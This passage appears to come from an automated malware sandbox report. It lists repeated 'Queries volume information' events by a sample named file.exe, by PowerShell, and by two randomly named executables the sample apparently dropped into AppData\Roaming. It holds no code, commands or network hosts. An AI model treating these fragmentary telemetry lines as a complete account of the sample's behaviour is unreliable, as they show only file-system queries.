                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
